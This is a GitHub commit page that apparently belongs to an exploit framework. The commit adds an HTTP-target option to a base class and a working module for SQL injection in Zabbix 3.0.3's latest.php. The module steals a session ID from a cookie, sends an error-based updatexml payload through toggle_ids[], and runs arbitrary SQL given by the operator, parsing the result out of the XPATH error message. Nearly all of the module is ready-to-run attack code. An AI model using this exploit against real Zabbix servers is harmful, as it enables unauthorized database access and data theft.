Skip to content

Commit 069f02d

Browse files
TuuuNyaTuuuNya
committed
feat(module): add suppoort for http target
add register_http_target add zabbix latest sqli
1 parent 94f5ef7 commit 069f02d

File tree

3 files changed

+85
-0
lines changed

3 files changed

+85
-0
lines changed

lib/BaseExploit.py

+7
Original file line numberDiff line numberDiff line change
@@ -41,6 +41,13 @@ def register_tcp_target(self, port_value=None, timeout_value=10):
4141
ExploitOption(name="TIMEOUT", required=True, description="Connection timeout", value=timeout_value)
4242
])
4343

44+
def register_http_target(self, timeout_value=10):
45+
self.target_type = "tcp"
46+
self.register_options([
47+
ExploitOption(name="URL", required=True, description="The url to be tested"),
48+
ExploitOption(name="TIMEOUT", required=True, description="Connection timeout", value=timeout_value),
49+
])
50+
4451
def update_info(self, info):
4552
for name in info:
4653
if name in self.info_fields:

modules/exploits/http/zabbix/__init__.py

Whitespace-only changes.

modules/exploits/http/zabbix/zabbix_latest_php_sqli.py

+78
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,78 @@
1+
import re
2+
import requests
3+
from lib.BaseExploit import BaseExploit
4+
from lib.ExploitOption import ExploitOption
5+
6+
7+
class Exploit(BaseExploit):
8+
def __init__(self):
9+
super(Exploit, self).__init__()
10+
self.update_info({
11+
"name": "zabbix latest.php sqli",
12+
"description": "zabbix 3.0.3 latest.php sql injection",
13+
"author": ["unknown"],
14+
"references": [
15+
"http://www.openwall.com/lists/oss-security/2017/01/12/4",
16+
"https://support.zabbix.com/browse/ZBX-11023",
17+
"http://www.debian.org/security/2017/dsa-3802",
18+
"http://www.securityfocus.com/bid/95423",
19+
],
20+
"disclosure_date": "2017-01-12",
21+
"service_name": "zabbix",
22+
"service_version": "3.0.3",
23+
})
24+
self.register_http_target()
25+
self.register_options([
26+
ExploitOption(
27+
name="SQL",
28+
required=True,
29+
description="The SQL statement you want to execute",
30+
value="updatexml(0,concat(0xa,user()),0)"
31+
)
32+
])
33+
34+
def check(self):
35+
url = self.options.get_option("URL")
36+
try:
37+
session = requests.session()
38+
response = session.get(url)
39+
zbx_sessionid = response.cookies.get("zbx_sessionid")
40+
sessionid = zbx_sessionid[-16:]
41+
check_response = session.get("{url}/latest.php?output=ajax&sid="
42+
"{sessionid}&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,"
43+
"concat(0xa,password(123)),0)".format(url=url, sessionid=sessionid))
44+
if "23AE809DDACAF96AF0FD78ED04B6A2" in check_response.text:
45+
self.results.success("URL:{} has the vulnerability".format(url))
46+
else:
47+
self.results.failure("URL:{} does not have this vulnerability".format(url))
48+
except TypeError:
49+
self.results.failure("URL:{} Maybe not zabbix? not found zbx_sessionid".format(url))
50+
except Exception as e:
51+
self.results.failure("URL:{} does not have this vulnerability, error:{}", format(url, str(e)))
52+
return self.results
53+
54+
def exploit(self):
55+
url = self.options.get_option("URL")
56+
sql = self.options.get_option("SQL")
57+
try:
58+
session = requests.session()
59+
response = session.get(url)
60+
zbx_sessionid = response.cookies.get("zbx_sessionid")
61+
sessionid = zbx_sessionid[-16:]
62+
exploit_response = session.get(
63+
"{url}/latest.php?output=ajax&sid={sessionid}&favobj=toggle&toggle_open_state=1&toggle_ids[]={sql}".format(
64+
url=url,
65+
sessionid=sessionid,
66+
sql=sql,
67+
))
68+
exploit_result_text = re.search(
69+
r"\[XPATH syntax error: '</li><li>(.*?)'\]</li></ul>",
70+
exploit_response.text
71+
).group(1)
72+
self.results.success(message="Exploit result: {}".format(exploit_result_text))
73+
except TypeError:
74+
self.results.failure("URL:{} Maybe not zabbix? not found zbx_sessionid".format(url))
75+
except Exception as e:
76+
self.results.failure("URL:{} does not have this vulnerability, error:{}", format(url, str(e)))
77+
finally:
78+
return self.results

0 commit comments

Comments
 (0)